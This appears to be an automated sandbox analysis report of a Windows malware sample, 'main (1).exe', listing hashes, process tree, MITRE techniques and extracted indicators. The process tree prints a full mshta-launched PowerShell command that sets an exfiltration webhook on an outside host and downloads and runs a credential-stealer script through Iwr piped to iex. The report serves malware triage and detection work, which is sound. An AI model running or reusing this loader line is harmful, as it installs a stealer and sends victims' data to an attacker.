f57315d9f70cab67669c23e10b081aac70f336369605d8c5e3079411f61e36de

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
14/07/2024, 23:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

main (1).exe
Size

89KB
MD5

755ee27c14914293c29ce91be08c20df
SHA1

cd4b0c9f25261d59689416734f9495a0c30bde17
SHA256

f57315d9f70cab67669c23e10b081aac70f336369605d8c5e3079411f61e36de
SHA512

a250ef4af67d0b5cb4d671ae72f689fcfc4704c0ce99768a7408e0824b1465f9e94e9027f8e6b2855bc0dfe4201deca85333809d34fad617e7ab411c7e10540c
SSDEEP

1536:R97fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfBweOy:Rp7DhdC6kzWypvaQ0FxyNTBfBt

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://full-recording.gl.at.ply.gg:14817/data

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2812	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2812	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2824 wrote to memory of 2948	2824	main (1).exe	32
PID 2824 wrote to memory of 2948	2824	main (1).exe	32
PID 2824 wrote to memory of 2948	2824	main (1).exe	32
PID 2824 wrote to memory of 2948	2824	main (1).exe	32
PID 2948 wrote to memory of 2680	2948	cmd.exe	33
PID 2948 wrote to memory of 2680	2948	cmd.exe	33
PID 2948 wrote to memory of 2680	2948	cmd.exe	33
PID 2680 wrote to memory of 2408	2680	net.exe	34
PID 2680 wrote to memory of 2408	2680	net.exe	34
PID 2680 wrote to memory of 2408	2680	net.exe	34
PID 2948 wrote to memory of 2816	2948	cmd.exe	35
PID 2948 wrote to memory of 2816	2948	cmd.exe	35
PID 2948 wrote to memory of 2816	2948	cmd.exe	35
PID 2816 wrote to memory of 2812	2816	mshta.exe	36
PID 2816 wrote to memory of 2812	2816	mshta.exe	36
PID 2816 wrote to memory of 2812	2816	mshta.exe	36

C:\Users\Admin\AppData\Local\Temp\main (1).exe
"C:\Users\Admin\AppData\Local\Temp\main (1).exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2824
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FBBD.tmp\FBBE.tmp\FBBF.bat "C:\Users\Admin\AppData\Local\Temp\main (1).exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2948
- - C:\Windows\system32\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2680
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:2408
- - C:\Windows\system32\mshta.exe
    mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$webhook = 'h' + 'ttps://full-recording.gl.at.ply.gg:14817/data';$debug=$false;$vm_protect=$false;$encryption_key = 'YOUR_ENC_KEY_HERE';$blockhostsfile=$false;$criticalprocess=$false;$melt=$false;$fakeerror=$false;$persistence=$false;$write_disk_only = $false;$t = Iwr -Uri 'https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1' -USeB | iex",0))
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$webhook = 'h' + 'ttps://full-recording.gl.at.ply.gg:14817/data';$debug=$false;$vm_protect=$false;$encryption_key = 'YOUR_ENC_KEY_HERE';$blockhostsfile=$false;$criticalprocess=$false;$melt=$false;$fakeerror=$false;$persistence=$false;$write_disk_only = $false;$t = Iwr -Uri 'https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1' -USeB | iex
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\FBBD.tmp\FBBE.tmp\FBBF.bat

Filesize
707B

MD5
c11ddd77e6fd87bfd91da46629012670

SHA1
d72617510c45e258583ad25801c92b97152bb2b9

SHA256
243627dc5cc3254b95baeaa0fff9e11c377125a587788abf7aa408129550fef7

SHA512
8eca3612c655f7c1054a993525689f34ac7f777b357e0a2ec48f4786aaba345c594eb7a306630eaed6739e1bc970054b0db279adb7c143da87f19fcd7519d411

Download Submit
memory/2812-6-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2812-7-0x0000000002320000-0x0000000002328000-memory.dmp

Filesize
32KB

Download